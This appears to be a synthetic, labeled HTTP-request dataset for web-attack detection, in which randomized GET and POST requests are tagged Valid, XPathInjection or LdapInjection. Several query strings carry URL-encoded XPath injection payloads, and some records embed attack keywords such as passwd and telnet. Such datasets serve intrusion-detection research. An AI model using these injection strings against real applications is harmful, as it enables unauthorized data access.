class: Valid
GET /rBazFP4142/iZ@jv_pC-GuAwL8tqB7z/vaaft6ttsiesmalrA/ranta26/esaiPxfhaoatLdsa/esezRwem7errhpnrr/fTP3U.0H3gVn/trsrsempdrtbes.jpg?ndiic=7607472 HTTP/1.1
Host: 227.72.110.107:80
Connection: 5oAs89
Accept: text/plain;q=0.3, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 3sxuee-srI, hih-t1eteDt5;q=0.1
Cache-Control: h=6h
Client-ip: 228.234.165.65
Cookie: Aehsnrlsrbypk=67691686
Cookie2: $Version="720"
Date: Tue, 05 Oct 04 24:14:51 CET
ETag: W/"oTArCAOdK_hJSEWM3kO"
Expect: 100-continue
From: aucneam2@riewaCaudy.st
If-Modified-Since: Tue, 29 Jul 08 06:26:45 GMT
If-Unmodified-Since: Wed, 18 Mar 09 06:53:00 CET
If-Match: *
If-None-Match: *
If-Range: "F0t8SeDR2flec8nUf"
Max-Forwards: 6
MIME-Version: 2.5
Pragma: 659tn1='aaeetbaL'
Proxy-Authorization: Basic ZWFzcmZUczY6YmlkaXc=
Authorization: Basic dHhJbmFNOmNobm9EMw==
Range: 12361-,4-
Referer: http://ojiv.de/sneezVE2/ekooon/97iIof/rhlnro.gif
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: ehRid@k http://www.tl7kciha.org
UA-CPU: Sparc
UA-Disp: 7024,486,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 335x343
Via: 5.0 www.leettr.png, HTTP/2.7 174.5.96.178
Transfer-Encoding: tnpon
Upgrade: 1co/3.1, rqt0h/3.7, assau4/8.1
Warning: 846 14.21.113.100 "fyetrt" 
X-Forwarded-For: 220.222.195.180
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26596
Start - Id: 1470
class: Valid
GET /nE/sz1ZUuCDj3jgFD/documentspH-yb/l5-ixqdcSeGIiST/u6qp2eofuyCoIj/ae6dgom5rtt1L6Y7casR/xNkg7eU6aodo/Ehniyss/tvQkbvXjkeSw.sh?BPea6tmpm2yd=a.Hwuyqb HTTP/1.0
Host: 150.248.200.213
Connection: lribde
Accept: text/xml, video/*, application/*;q=0.4
Accept-Charset: gb2312;q=0.5, utf-7, iso-8859-2;q=0.8, cp-936
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 109.166.117.239
Cookie: emrsAebn1nsfiwT=3;oLFdua5h=rmfbf2uaoeBb;7acauhn=ysn ;drnOa=15;5@IAE=oBvk9jB;mIlosielSvi=Aefs5i7easl
Cookie2: $Version="17"
Date: Wed, 07 Jun 06 23:57:11 GMT
ETag: W/"Ila-fdud7MEedwFbpQb@"
Expect: 100-continue
From: s8wenUT@gvestweiep.st
If-Modified-Since: Sun, 19 Apr 09 16:17:39 UTC
If-Unmodified-Since: Mon, 05 Jan 04 09:13:26 UTC
If-Match: "8f3A5os_QIWHW_W"
If-None-Match: "CsSD7Xe2Fgh_q50wz"
If-Range: Thu, 21 Jun 07 08:40:33 GMT
Max-Forwards: 049
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: iUTNle deiuEMot=etidst
Authorization: Digest qop=auth
Range: -64,0-
Referer: /fooqhe9r/meWg/sipfiof.swf
TE: gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: ieodiiinehn2
UA-CPU: 68000
UA-Disp: 8211,4970,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 601x836
Via: 2.0 www.shRxt.jpg, 1.9 11.105.78.66
Transfer-Encoding: tprwbg
Upgrade: rydnlO/6.9, soet8/5.4, 3nntB/3.8, o4o/9.3, newo/1.6
Warning: 048 www.resetlo.js "j7eznorhohrr83qef4f" 
X-Forwarded-For: 6.0.93.109
X-Serial-Number: 8617636872722590
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1470
Start - Id: 28816
class: Valid
GET /tecEyn3ud3Nce/tg/MJDwxin3HIA3QviB/Pttre95L56lPosIRg/lr6v1stiivlsb/q3bvwmeeiCuhouahjLal/e3dt0u6tds.sh?hIsesEdroi5nga=780665&ehSi=sar&aT3T3wr=9lajokAq%3Ddtnetcato&ehoNHsma2t=59011&obm=933335919&bouse6t2rtt=97163&2onnoeinikcAarj=86&0d.YoL=7185&-E48EI=htacces&ziwO=1W_IJ0IX HTTP/1.1
Host: 65.5.92.121
Connection: close
Accept: application/*, image/gif, application/zip
Accept-Charset: iso-2022-jp;q=0.2, cp-932;q=0.4, x-mac-hebrew;q=0.3
Accept-Encoding: *
Accept-Language: f0f-hgocsi, nAshnma-1bde5, eOxD58-an;q=0.1
Cache-Control: max-age=34844
Client-ip: 177.57.100.186
Cookie: OKi1ieItE=nneynstnr
Cookie2: $Version="138"
Date: Tue, 29 Jan 08 23:44:31 GMT
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Sun, 27 Nov 05 20:55:02 CET
If-Unmodified-Since: Fri, 26 Sep 08 17:25:49 CET
If-Match: "rrNrjg6L87b_vXB"
If-None-Match: "zbsklkXt3M-d5gzxpU"
If-Range: "INchvn4BBleEr6vB0iFZ"
Max-Forwards: 718
MIME-Version: 3.0
Pragma: bnmwanl=nsNEd
Proxy-Authorization: hdae faMstat=0egsty
Authorization: Digest realm
Range: -655480,928-436
Referer: http://www.lgix.it/ptnoise/dmnu/fnhn9/iImentis/3aeaa.wmn
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.0 (compatible; MSIE 8.5; Open BSD i386; iDrn8)
UA-CPU: 68000
UA-Disp: 587,522,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 405x937
Via: 5.0 www.ltIlgiF.shtml
Transfer-Encoding: Rmidss; cn521eth=ydNpn
Upgrade: dma/7.4, st8cs/3.2, ehL/8.4, tDaep/0.4
Warning: 591 www.2iae.css "moahvhy6y9oI" "Fri, 27 Jul 07 17:55:14 GMT"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28816
Start - Id: 21450
class: Valid
GET /mrme4.cfm?heCcpttn4=e7M3aE9ainsert4&qorD1=8357&adlne06=e3ee+9ewHI2Wsttt+c&pL=%3D&ev=6585&aX.b.=e%7Ce&rfelTutt4e=eeq1iynwthhwaeA HTTP/1.1
Host: www.toareuwe.st:656
Connection: keep-alive
Accept: image/*;q=0.1, text/*, application/*
Accept-Charset: windows-1250;q=0.0, windows-1254;q=0.6, windows-1254, iso-8859-1;q=0.9, windows-1253
Accept-Encoding: 
Accept-Language: eg-am;q=0.3, ltnW-arBh, nyeoItt-ackoeesy;q=0.7
Cache-Control: max-stale=9
Client-ip: 91.48.79.53
Cookie: voloa=t09Z7gl4;uceereutidn7o=eKaXb-hYi;WVlvpGEdCwinnt=proq
Cookie2: $Version="0"
Date: Fri, 28 Dec 07 12:38:58 CET
ETag: "Fc9xjzK5EcBQ14HX-NU3"
Expect: oteA=anomr
From: eaheebse@4eGrkw.uk
If-Modified-Since: Thu, 01 Feb 07 07:56:55 CET
If-Unmodified-Since: Sat, 27 Jan 07 12:27:13 GMT
If-Match: "FtJFw3Z9NZCLCu5"
If-None-Match: *
If-Range: "pJBrAQYY6b7tTqITvIs"
Max-Forwards: 761
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM eXBoc2toeG9BbnRsbGVkZmFiZTJvcnJpTGNyNVljdzJsZW5hdXV1bnJuRTByb0U=
Authorization: nest eeciete=ewh3oo
Range: 21333-1766,-00,-67436
Referer: /1xii1hrT.asmx
TE: trailers
Trailer: TE
User-Agent: 22aoni
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2698x837
Via: FTP/8.2 52.68.17.91, 4.9 www.s3oo2saa.png
Transfer-Encoding: qlso
Upgrade: ree/2.8, tsn/6.2, gd3uq/8.4, 4fta/7.3
Warning: 868 www.psaerr.png "ieSephnp" 
X-Forwarded-For: 153.129.48.252
X-Serial-Number: 321441502
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21450
Start - Id: 18463
class: Valid
GET /zO7cM2ls8VsautoexecXV/wiesakul/0ry1tIi/anpldomhe5iHsn0mT/eZth5c3fh15v/5SmKGwqJ5vFkWA4Vp/re2N3erH8eiivomteo.jsp?r1group bymyUUsx=eTel&sjhN3Z5wm=fj7rs%40jtdQ_&dtwibddwtt=nYehaoaM&SlOchglrr=k&hr=ne5fwjU&tqwtajhot=eo6S+&nfaDuse21otmec=nnorelt&ssaeiphtege=3&oEc=2143&logmWxN=oM&epe=%3FdofV7tas1zoree&0IcM9perl=Estfgte&cPkrdropl=123630&tsesaLtxut=emEc&xineeuSbaasdsn=nuZR3PT0 HTTP/1.1
Host: www.h7znbos.uk
Connection: close
Accept: */*;q=0.8
Accept-Charset: us-ascii;q=0.3, x-mac-roman, x-mac-roman
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: Lrih=xr
Client-ip: 223.195.59.109
Cookie: R3Rkclsihieist=3LOQ;tbzatee=57;rmaiossdkcTuO=57;1nacnr0eh=55507248;iiusrh5wz=ttgterwetiusn
Cookie2: $Version="6"
Date: Fri, 20 Jan 06 24:40:28 UTC
ETag: W/"sUt9QeNx4z1GOOplf"
Expect: 100-continue
From: tgrartc0@enmrneaz9.org
If-Modified-Since: Wed, 04 Mar 09 10:08:17 UTC
If-Unmodified-Since: Fri, 07 Jul 06 23:48:01 CET
If-Match: *
If-None-Match: *
If-Range: "rvqFv15fdwTbnUGdz"
Max-Forwards: 80
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: NTLM bnU0bHR0UHQ1bjNjSW93YXJOZXRvb2VFaXdxaWFpdTRoZXdlbGI=
Range: 72-79
Referer: http://otdEau7h.be/6tan/3tB74z/dTypeme/haossmfe/do4k.gif
TE: trailers
Trailer: Via
User-Agent: pmldP5RSD http://www.cho3alo.ch
UA-CPU: PowerPC
UA-Disp: 454,2139,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: g0eN/9.3 224.175.144.214
Transfer-Encoding: compress
Upgrade: emlqe/4.7, 0ijpy/5.5, 2ee/6.9
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 110.33.123.65
X-Serial-Number: 25635510975973984373
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 18463
Start - Id: 11838
class: Valid
GET /HmynceE4.mspx? HTTP/1.0
Host: www.9grsideei.it:1
Connection: close
Accept: video/mpeg;q=0.1
Accept-Charset: big5;q=0.3, iso-2022-jp, windows-1253, big5;q=0.3, windows-1254;q=0.7
Accept-Encoding: 
Accept-Language: mte6ie-d;q=0.4, 7d7e-iBbe, wLeel43-cir;q=0.2, nAeatKbi-l;q=0.7, i-tI0Ll
Cache-Control: no-cache
Client-ip: 144.242.117.107
Cookie: dtrtIa7ftas=e-3bBM1hAvxv;d5eimnnmmdejrI=3238;ad7orfeUiqlma=hlOaeHxa?gvbscriptnhn;i8ijtcoPstSar0g=hAd aticeebstdinrtaetcpe;l9IbseaarT8ma=a1ND
Cookie2: $Version="845"
Date: Mon, 04 Oct 04 01:43:05 GMT
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: hheiA3
From: raeRsdn@ezgoodi.biz
If-Modified-Since: Mon, 05 Apr 04 21:22:52 GMT
If-Unmodified-Since: Wed, 23 Apr 08 09:05:11 GMT
If-Match: *
If-None-Match: "WqX.P.Nh0Cqj@TqG3az"
If-Range: Mon, 21 Jan 08 05:59:46 UTC
Max-Forwards: 6545
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM bmE4SnVlb2xuWWVmZXNPb2NwOWg3emVvbmdjY2Vhd2ZnYWFhb2xl
Authorization: NTLM d2s4bXB0dG5GYXdtbml0MnRpT25rZTJrdGxybDhNZ29p
Range: -9087,256-
Referer: /rnrtn/utyhaht/gmEpeGin/oyzeot.gif
TE: deflate;q=0.1
Trailer: From
User-Agent: iaMi6w http://www.6r2os.uk
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.2 www.ed7r.htm, 5.5 www.c4dr.png
Transfer-Encoding: compress
Upgrade: qeona/2.2, e3aae/0.6
Warning: 779 www.runsnon.css "al5s6npNr3oe0Heo" "Sun, 08 Mar 09 02:18:33 CET"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 63208652767395
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11838
Start - Id: 49639
class: XPathInjection
GET /Znln/nTZeeaoA4rnathntcuee/sUIf3olT0-bS/fdYYn2u2jn/linput8cykEQMdiv/to/y-viAqrDD36ni/DiIcafcib7dsemyeNpE.nsf?sei=366892&ljgopbd=eiser4%2FmJdsb%2FomeEt%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D36%5D+%7C++hi%2Fe6tms%2Fat%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D60%5D++++or+%27tmh1P%27++%3D+%27 HTTP/1.1
Host: 6.118.26.132:80
Connection: stgsT
Accept: */*;q=0.0
Accept-Charset: windows-1252;q=0.7, x-mac-turkish
Accept-Language: *;q=0.4
Cache-Control: no-cache
Date: Wed, 25 Jan 06 03:26:06 UTC
If-Modified-Since: Mon, 10 Jul 06 02:16:17 UTC
If-Unmodified-Since: Thu, 15 Oct 09 02:06:27 CET
If-Range: Sat, 28 Oct 06 16:29:57 CET
MIME-Version: 8.5
Pragma: zgueGyx=uscoqgt
Referer: /2S83/rma1tZu/psdut/yw7b.cfm
User-Agent: ea2otRe/6.1.3.4
Via: hTtti/7.8 245.21.9.86:48328
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 460757969488

null

End - Id: 49639
Start - Id: 1836
class: Valid
GET /t7K/aTID6kK_76/tGnKbnnCy7ehU9lJYq/SidA-MJ.php3?yh=me1O%3B%3Fyvst6inzltmp&aatcniotmhn8n=dhetoeEnwsol&Rn6ldDtc6yz=linkm&aq7jqnlhsetYlu=hde+aEraieg&@xESfoDNYr=ftp9body&mRoyLpz4nh=ee+aa HTTP/1.0
Host: www.lorh.gov:657
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: LUhmtho-eetsMrX8
Cache-Control: no-store
Client-ip: 211.115.143.28
Cookie: Rlelax5MH2X9=HeTitausre ;U7from7Eformp00dI.G=lkjZUtp1qYXe
Cookie2: $Version="8"
Date: Thu, 09 Sep 04 17:51:25 GMT
ETag: W/"9xp7H1.z_m@8nyN"
Expect: eulaEkr
From: 3efxevA@th7onls.be
If-Modified-Since: Sat, 29 Nov 08 16:57:06 GMT
If-Unmodified-Since: Tue, 04 Sep 07 10:22:39 GMT
If-Match: "WLCvomtaw3hBB7T"
If-None-Match: *
If-Range: "ELetv.6ji4nWiFP"
Max-Forwards: 41
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: NTLM aWl3ZnJhanRub2xndG1raDBFUmVpdXI1aWVobmFUYWl6dA==
Range: -34624,61390-055,75119-
Referer: http://ro626t.com/nyceo/zp9emal/dniN/goEtt/2sinnnA7.gz
TE: gzip
Trailer: From
User-Agent: Mozilla/4.7 (compatible; Konqueror/3.2; Open BSD i586; A3wt; eYpuY)
UA-CPU: x86
UA-Disp: 284,265,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 286x332
Via: 3.2 188.252.122.136, FTP/8.8 166.178.109.112
Transfer-Encoding: deflate
Upgrade: mntn/9.1, 8tme/6.2, rRoA/2.8, jle/4.8
Warning: 573 157.79.201.89 "RaeAo8nmaDnK4arma" "Tue, 03 Aug 04 15:37:42 UTC"
X-Forwarded-For: 22.125.3.165
X-Serial-Number: 0392549
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1836
Start - Id: 1578
class: Valid
GET /nae4lhhuis/6NZ@vbscriptmpasswd/Pxh/iuJZZXRqOTrvMq3Qg3E/rfedslm6ieer/hntijbmO5aeores.shtml? HTTP/1.0
Host: 137.223.194.236
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 108.245.18.242
Cookie: 1tigt=?andvwindow.openechotedd&hperlr;y3Tis4rcs=3lo;rekhsx=iDaOkZa7zJ;hLnKhalwr=18;ECZHFfY@PP=/t
Cookie2: $Version="959"
Date: Tue, 05 Feb 08 17:18:55 CET
ETag: W/"GCIpBDKeCjwWpDExWZ3"
Expect: 100-continue
From: sqs6iok@HnslapestF.uk
If-Modified-Since: Tue, 16 May 06 09:31:32 CET
If-Unmodified-Since: Sun, 26 Oct 08 10:30:17 GMT
If-Match: "GtJ7@aYZID_iFF5BJC"
If-None-Match: "xk2Fls8x-.o_iJMD0T"
If-Range: Wed, 02 Aug 06 13:03:31 UTC
Max-Forwards: 6167
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic cmlvNm5zOnJ0cHI=
Authorization: Basic ZWVjYXNueHc6Z3llc2Jyc2U=
Range: -7155,577-
Referer: http://snbsocir.uk/y8pmgbf/elmcb.jpg
TE: trailers
Trailer: Accept-Language
User-Agent: nlcEud2u
UA-CPU: StrongARM
UA-Disp: 7507,6245,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7934x8697
Via: 8.4 41.131.132.227
Transfer-Encoding: deflate
Upgrade: ysw6sh/0.5
Warning: 673 72.154.61.36 "gnhtlcs" "Wed, 10 May 06 10:46:29 UTC"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 098456247277299
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1578
Start - Id: 36852
class: LdapInjection
GET /A5N6D.mspx?anzfD3aklo=ieln%2F&Re=6933151&RcopyWErdeletezeMka=b87winntsSeotaetbi+&h8cnzile0d7t=oana HTTP/1.0
Host: 122.135.34.248
Connection: hdot9AN
Accept: text/*;q=0.9, video/*;q=0.8
Accept-Charset: ks_c_5601-1987, ks_c_5601-1987;q=0.1, iso-8859-3;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: oIyo=o
Cookie: ea2ae=62506243;lfed=3059200607;8-@L=88410692
Cookie2: $Version="869"
Date: Sat, 11 Dec 04 10:06:12 GMT
From: lvelladt@3trbvtitH.net
If-Unmodified-Since: Fri, 29 Dec 06 03:16:31 CET
If-Match: "GFONQ2Kta4_W@mnc"
If-None-Match: *
If-Range: *
Max-Forwards: 1
Pragma: 0whilhi=tb
Authorization: Digest qop=mHqnqpi
Range: -0235,09-
Referer: /iceioity/meurt.bin
User-Agent: ) (   |    (1xa=lrm*)
UA-Pixels: 6170x381
Via: 0enwi/6.3 69.33.121.221:3
Transfer-Encoding: compress
Warning: 449 www.1trt.gif:081 "UlredsomtoT1g" "Sat, 20 Feb 10 20:48:04 UTC"

null

End - Id: 36852
Start - Id: 29885
class: Valid
GET /ll4GpWaSu/e_5FxuRUG.fIxDN/o2ELkjGxo4X1RhAH0/w5wZjrL4zMKNF2ZYT.gif? HTTP/1.1
Host: 217.21.79.203:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-5;q=0.3, windows-1251, iso-8859-5, koi8-r
Accept-Encoding: *
Accept-Language: e-nhNtuhE
Cache-Control: 3on6O=ee
Client-ip: 214.124.111.84
Cookie: shlolbeWed=tmev;ae3yytyoicac=920;Hokusrv2khLH=eirht\1unaSs;d97ouaom1s4nn=28;4fe8inbBanmbgAn=g6=oedrzut8s
Cookie2: $Version="8"
Date: Sun, 23 Sep 07 08:14:28 GMT
ETag: "_HcuzOFrt2f6RVmj"
Expect: AbexcEll=Tbddt
From: oge1@piabtEr.uk
If-Modified-Since: Thu, 20 Mar 08 10:17:15 CET
If-Unmodified-Since: Tue, 09 May 06 22:59:32 UTC
If-Match: "1zxJaNfmFwiXmnnVI"
If-None-Match: "q6_4Jlwq@USkMEQ"
If-Range: Sun, 19 Feb 06 01:04:14 CET
Max-Forwards: 232
MIME-Version: 7.6
Pragma: Islrc='alnalmeT'
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Digest qop=torc
Range: 71-
Referer: /gejlto.exe
TE: chunked;q=0.0,deflate;q=0.1,deflate;q=0.1
Trailer: Expect
User-Agent: wecnpOrsdaTmyicteq
UA-CPU: Sparc
UA-Disp: 754,5719,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 787x2040
Via: 9.3 www.nwaast.htm, FTP/2.3 90.227.197.11, HTTP/5.8 www.Ii4e.shtml
Transfer-Encoding: compress
Upgrade: rens/6.9
Warning: 213 www.chsq.js "nlm16isgerEe" "Sat, 10 Oct 09 10:33:19 CET"
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29885
Start - Id: 49502
class: XPathInjection
GET /lr4YSlA_GNUmS/0leaosp/stcstg/kGaZ-e9S0/nCkCZ/p0KQ/pej2WdNke1O4s.aspx?RqKpVx=s5A_3TSy&iraeBoathr=siperlet%5C%7E%3Bnodedo&nsYIexecupdateB-dz-=erei%27++or++++%28i++%3C+++count%28ai7o%2Fchild%3A%3Atext%28%29%29++++and++j+++%3C+++count%28leanT%2Fchild%3A%3Acomment%28%29%29+++and+k+%3C+++count%28nYol%2Fchild%3A%3A*%29++++%29+++or+%27tSs%27++%3D+%27+++++oLeo7e%27+or&StelnetPGLZH3s=g+vsR+location&wss9sDto39cf=tZGX5G0pZG&0erauPnier=%3Eof1N&tcontnpt4dp=i&seuivdhkhra=bIYuy4vSqh%40y HTTP/1.0
Host: 184.7.243.187
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, iso-8859-9;q=0.8, x-mac-hebrew, iso-8859-8-i;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 97.199.98.244
Cookie: twpt=oabzim0;um9eak=lcmnr>an)tiA;awzcteisdi=oCbmcAI8W5r;eahinp=898832;ef4ddyeef8ioiay=oa;cmoerHxsc=acolStat8l
Cookie2: $Version="238"
Date: Tue, 22 Apr 08 07:12:23 GMT
ETag: W/"vdwNvb46rS8r1KeBCz3"
Expect: 100-continue
From: amlp2vta@vfese.gov
If-Modified-Since: Sun, 18 Jun 06 07:37:29 GMT
If-Unmodified-Since: Sat, 19 Jun 04 06:56:04 CET
If-Match: *
If-None-Match: "1_@.nByJ_9pc-HDWlxql"
If-Range: Fri, 29 Jun 07 19:12:00 CET
Max-Forwards: 2025
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: oou7tu fstmaHe6=oaua
Authorization: tnh1u rsoensn=Sbuoti
Range: 2-801463,7709-,5-5829
Referer: /thwr7m/dTnL/srthpht8/f0srhre/aceuef.php4
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/3.4 (compatible; d8ouoieydn; Unix; ntEt; tehl)
UA-CPU: 68000
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4726x3292
Via: 7.6 171.145.143.112, FTP/0.0 15.145.31.115
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 063 21.35.61.71 "elaoim3oti" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49502
Start - Id: 35703
class: XPathInjection
GET /hdstsexhbs/czrZWpVie9qjmuoj-aw/eigioe3umtczanf/nSpemwaen/pthbtpEehece/OpK/dvwW8v/on/eYhK44JZznnY7X/5KzTEXL-DCH8LffznE./ryliri0tfehDoekdah/nLo-3aI22r.jpg?qHpDxS=eeseevl%27+++++or+%28i++++%3C++++count%28OhN%2Fchild%3A%3Atext%28%29%29+++and+++j+++++%3C++count%28hrio%2Fchild%3A%3Acomment%28%29%29+++and++k+%3C+++++count%28yi4e%2Fchild%3A%3A*%29++%29++++or+++%27hmeeoi%27+++%3D++%27+++++smX%27+++or&id1Eo6C=+e+telnet%3Aeuc%25vr+yo7Sj%2F%5Da&x2bgkandL68P4_=097349&2Ih=bodyxv&syX=0&eoon8e=ctathsinserti+D+metaDe&ikfT4re=7375&egni=5onecis1edede0oweo&6pvPIOnj=34219&thitenad=0cdHUDweY HTTP/1.1
Host: www.eiqtn.fr
Connection: close
Accept: video/*;q=0.4, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=347
Client-ip: 87.168.72.128
Cookie: l5updateMkL2oWk=oformg6U\;2Ncplov=7780890;kaMu=6q06lvF;es5eHehmirza6ce=49748812;rtnAnwi=686833
Cookie2: $Version="52"
Date: Tue, 13 Sep 05 22:11:02 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: 0iiTea@WooaceteB.de
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Fri, 15 Sep 06 01:40:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 30
MIME-Version: 3.9
Pragma: n9=8
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: /raeeii/tlclem/era6/voF6zj/ekgg.conf
TE: chunked,deflate;q=0.6,deflate
Trailer: TE
User-Agent: sriwb8 (eUzxzDts0s; tVgjwX; snJGxp; 58M0YbTARp; rNnO9Xs)
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/1.3 www.a1gele.png:2044
Transfer-Encoding: gzip
Upgrade: dOa8/7.7, iisei/3.4, ylle/7.0, laix/9.7, vbeu/5.2
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35703
Start - Id: 32756
class: Valid
POST /roegelriIuq/qyKC/1hndejoiTigtkh0e/ysctt.shtml? HTTP/1.1
Content-Length: 99
Content-Language: gtu
Content-Encoding: identity
Content-Location: http://soalTK8n.uk/ihdso09a/srrpzdac/stiti.pl
Content-MD5: aTBiMXM4NHRhb29pdGIzTw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 May 04 09:59:37 UTC
Last-Modified: Mon, 31 Dec 07 17:02:16 UTC
Host: 178.46.162.205:1831
Connection: behEsT
Accept: image/jpeg, application/*;q=0.3
Accept-Charset: us-ascii;q=0.4, iso-2022-jp, iso-8859-1
Accept-Encoding: *
Accept-Language: 1ljurcEe-eex, e4-e, viSt-8fJKoqtn, iuo-swda, xtlu-id
Cache-Control: max-stale
Client-ip: 207.121.232.123
Cookie: reorerSsae8tby=dzecat;Z0FWv5YD=uC2CMPp4
Cookie2: $Version="10"
Date: Mon, 24 Oct 05 23:34:13 UTC
ETag: W/"g3445XV.VSqisx_"
Expect: 100-continue
From: ynuuOeYe@e4oe.com
If-Modified-Since: Mon, 02 Aug 04 20:49:54 CET
If-Unmodified-Since: Mon, 09 Feb 04 09:47:38 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Aug 06 22:22:17 GMT
Max-Forwards: 4
MIME-Version: 9.2
Pragma: bu=66nt
Proxy-Authorization: Digest response="B8FE2AAfB726BcEAE1dD65cE86Fe158B"
Authorization: Digest cnonce="geIS"
Range: 7780-1621,55-
Referer: http://www.iansT.st/dw2teizg/oogd/nhrhpz/khneohio.mp3
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.3 (compatible; nnthabOy; Win 9x; xTt1s9u; pmaonooit)
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1032x4856
Via: cvh5r9/2.8 143.30.110.219, 5.4 15.62.93.224:517, gsd/3.6 132.91.60.208
Transfer-Encoding: dltet; Isa893X=btliaam
Upgrade: ven/0.4
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 59787959
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

naanrwtErmdt=5cf0neenbo&d%uY_FxNz=snccantzaqttEae&SqwQL=itsso9&om04=pnlwbintHechovmura&rrHso=poetho

End - Id: 32756
Start - Id: 7497
class: Valid
POST /lLp9u/nuGdcMpyF70XCCCGIkJ/nntl4rsyhisojae/8VutWZ25_vaccess_logsystemEg/iaBy/des6fth/29N5d/vpG/nkn0aemc7rx5ao/lnhi/n7ypU7.rUBozGz4Q8.png? HTTP/1.0
Content-Length: 296
Content-Language: P,qtninPn,NeTAysC
Content-Encoding: gzip
Content-Location: http://www.maifs4t.ch/aievvso.php3
Content-MD5: bXNzNXhlZGVvc25oZGxabA==
Content-Type: application/x-www-form-urlencoded
